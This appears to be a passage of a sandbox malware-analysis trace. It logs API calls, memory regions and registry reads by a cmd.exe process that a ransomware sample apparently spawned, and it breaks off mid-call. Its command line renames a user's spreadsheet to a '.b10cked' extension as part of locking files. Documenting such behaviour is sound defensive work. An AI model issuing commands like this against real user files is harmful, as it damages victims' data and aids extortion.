returned 0x409 [0131.962] exit (_Code=0) Process: id = "108" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x990" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11948 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11949 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11950 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11951 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 11952 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11953 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11954 start_va = 
0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11955 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11956 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 11957 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12219 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12220 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12221 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12222 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 12223 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 12224 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12225 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12226 start_va = 
0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12227 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12228 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12229 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12230 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12231 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12232 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12233 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 12234 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12235 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" 
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12236 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12237 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 12238 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 12239 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12240 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 12241 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 12242 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 165 os_tid = 0x98c [0131.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fe14 | out: lpSystemTimeAsFileTime=0x28fe14*(dwLowDateTime=0x888ade80, dwHighDateTime=0x1d440a9)) [0131.887] GetCurrentProcessId () returned 0x990 [0131.887] GetCurrentThreadId () returned 0x98c [0131.887] GetTickCount () returned 0x2a015 [0131.887] QueryPerformanceCounter (in: lpPerformanceCount=0x28fe0c | out: lpPerformanceCount=0x28fe0c*=18867661838) returned 1 [0131.888] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0131.888] __set_app_type (_Type=0x1) [0131.888] __p__fmode () returned 0x76b331f4 [0131.888] __p__commode () returned 0x76b331fc [0131.888] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0131.888] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, 
_DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0131.888] GetCurrentThreadId () returned 0x98c [0131.888] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x98c) returned 0x38 [0131.888] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.889] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0131.889] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.889] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fda4 | out: phkResult=0x28fda4*=0x0) returned 0x2 [0131.889] VirtualQuery (in: lpAddress=0x28fddb, lpBuffer=0x28fd74, dwLength=0x1c | out: lpBuffer=0x28fd74*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.889] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fd74, dwLength=0x1c | out: lpBuffer=0x28fd74*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.889] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fd74, dwLength=0x1c | out: lpBuffer=0x28fd74*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.889] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fd74, dwLength=0x1c | out: lpBuffer=0x28fd74*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.889] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fd74, dwLength=0x1c | out: lpBuffer=0x28fd74*(BaseAddress=0x290000, AllocationBase=0x290000, 
AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.889] GetConsoleOutputCP () returned 0x1b5 [0131.889] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.889] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0131.889] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.889] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0131.889] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.889] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.890] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.890] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.890] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.890] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.890] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0131.890] GetEnvironmentStringsW () returned 0x3e0168* [0131.890] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0131.890] GetEnvironmentStringsW () returned 0x3e0168* [0131.890] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0131.890] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed14 | out: phkResult=0x28ed14*=0x40) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x0, lpData=0x28ed20*=0x90, lpcbData=0x28ed18*=0x1000) returned 0x2 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x1, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x0, lpData=0x28ed20*=0x1, lpcbData=0x28ed18*=0x1000) returned 0x2 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x0, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x40, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x40, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x0, lpData=0x28ed20*=0x40, lpcbData=0x28ed18*=0x1000) returned 0x2 [0131.891] RegCloseKey (hKey=0x40) returned 0x0 [0131.891] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed14 | out: phkResult=0x28ed14*=0x40) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x0, lpData=0x28ed20*=0x40, lpcbData=0x28ed18*=0x1000) returned 0x2 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x1, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ed1c, 
lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x0, lpData=0x28ed20*=0x1, lpcbData=0x28ed18*=0x1000) returned 0x2 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x0, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x9, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x9, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x0, lpData=0x28ed20*=0x9, lpcbData=0x28ed18*=0x1000) returned 0x2 [0131.891] RegCloseKey (hKey=0x40) returned 0x0 [0131.891] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0131.891] srand (_Seed=0x5b886366) [0131.891] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked\"" [0131.891] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked\"" [0131.892] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.892] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0131.892] GetEnvironmentVariableW (in: 
lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.892] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.892] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.892] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.892] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.892] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.892] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.892] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.892] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.892] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.892] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.892] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.892] GetEnvironmentStringsW () returned 0x3e22b8* [0131.892] FreeEnvironmentStringsW (penv=0x3e22b8) returned 1 [0131.893] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.893] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.893] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.893] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.893] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.893] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.893] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.893] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.893] _wcsicmp 
(_String1="KEYS", _String2="RANDOM") returned -7 [0131.893] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.893] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fae0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.893] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fae0, lpFilePart=0x28fadc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28fadc*="Desktop") returned 0x18 [0131.893] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.893] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f85c | out: lpFindFileData=0x28f85c) returned 0x3dfff8 [0131.893] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0131.893] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f85c | out: lpFindFileData=0x28f85c) returned 0x3dfff8 [0131.893] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0131.893] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f85c | out: lpFindFileData=0x28f85c) returned 0x3dfff8 [0131.893] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0131.894] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.894] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0131.894] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0131.894] GetEnvironmentStringsW () returned 0x3e2ad8* [0131.894] FreeEnvironmentStringsW (penv=0x3e2ad8) returned 1 [0131.894] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.894] GetConsoleOutputCP () returned 0x1b5 [0131.895] GetCPInfo (in: CodePage=0x1b5, 
lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.895] GetUserDefaultLCID () returned 0x409 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fc20, cchData=128 | out: lpLCData="0") returned 2 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fc20, cchData=128 | out: lpLCData="0") returned 2 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fc20, cchData=128 | out: lpLCData="1") returned 2 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0131.895] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0131.895] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.896] GetConsoleTitleW (in: lpConsoleTitle=0x3d08d0, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.896] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.896] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0131.896] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0131.896] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0131.897] _wcsicmp (_String1="move", _String2=")") returned 68 [0131.897] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0131.897] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0131.897] _wcsicmp (_String1="IF", _String2="move") returned -4 [0131.897] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0131.897] _wcsicmp (_String1="REM", _String2="move") returned 5 [0131.897] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0131.899] GetConsoleTitleW (in: lpConsoleTitle=0x28f918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.900] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0131.900] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0131.900] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0131.900] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0131.900] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0131.900] _wcsicmp (_String1="move", _String2="CD") returned 10 [0131.900] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0131.900] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0131.900] _wcsicmp (_String1="move", _String2="REN") returned -5 [0131.900] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0131.900] _wcsicmp (_String1="move", _String2="SET") returned -6 [0131.900] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0131.900] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0131.900] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0131.900] _wcsicmp 
(_String1="move", _String2="PROMPT") returned -3 [0131.900] _wcsicmp (_String1="move", _String2="MD") returned 11 [0131.900] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0131.900] _wcsicmp (_String1="move", _String2="RD") returned -5 [0131.900] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0131.900] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0131.900] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0131.900] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0131.900] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0131.900] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0131.900] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0131.900] _wcsicmp (_String1="move", _String2="VER") returned -9 [0131.900] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0131.900] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0131.900] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0131.900] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0131.900] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0131.900] _wcsicmp (_String1="move", _String2="START") returned -6 [0131.900] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0131.900] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0131.900] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0131.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.902] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.902] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f6d4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f6cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f6cc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0131.902] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", 
